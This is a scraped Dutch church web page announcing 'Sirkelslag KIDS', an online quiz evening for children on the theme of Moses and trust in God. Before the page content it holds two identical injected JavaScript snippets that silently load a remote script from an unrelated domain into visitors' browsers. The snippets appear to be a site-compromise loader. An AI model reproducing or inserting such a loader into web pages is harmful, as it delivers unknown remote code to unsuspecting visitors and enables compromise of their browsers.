;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Sirkelslag KIDS, een spannende online wedstrijd. - PKN Damwâld

Sirkelslag KIDS, een spannende online wedstrijd.

Gepubliceerd op: zondag 28 oktober 2018

JOP  organiseert elk jaar Sirkelslag kids. Een spannende online wedstrijd voor de groepen 6, 7 en 8. Het leukste interactieve online spel van Nederland?

De JO’s willen samen met jouw deze uitdaging aan gaan.

Sirkelslag KIDS wordt gespeeld vanuit  ‘De Ontmoeting’.

Via Facebook en Instagram sta je in contact met andere groepen in heel Nederland.

Het thema dit jaar is ‘Vertrouw op God’ en sluit aan bij de kerstcampagne van Kerk in Actie ‘Geef hoop aan kinderen op de vlucht’. Het verhaal gaat over Mozes. Het volk Israël is in een hopeloze situatie beland. Maar Mozes staat op, om samen met God, hoop te bieden en het volk te bevrijden van hun ellende. Wij gaan met Mozes mee en ontdekken door verschillende opdrachten, waarin uithoudingsvermogen, creativiteit, samenwerken, puzzelvaardigheid en enthousiasme nodig zijn, hoe God hoop gaf in deze moeilijke tijd. Ook nu kunnen we wat betekenen voor de mensen om ons heen. Zo komen we tijdens deze avond in actie om kinderen wereldwijd een betere toekomst te geven.

Wij doen mee met 3 groepen

  • Team Daniel
  • Team Simson en
  • Team David

16 november, locatie: De Ontmoeting, aanwezig om 19.00-19.15.  Start Sirkelslag om 19.30 uur

Kom jij ook !

Voor meer informatie kun je terecht bij de JO’s.

Image result for sirkelslag kids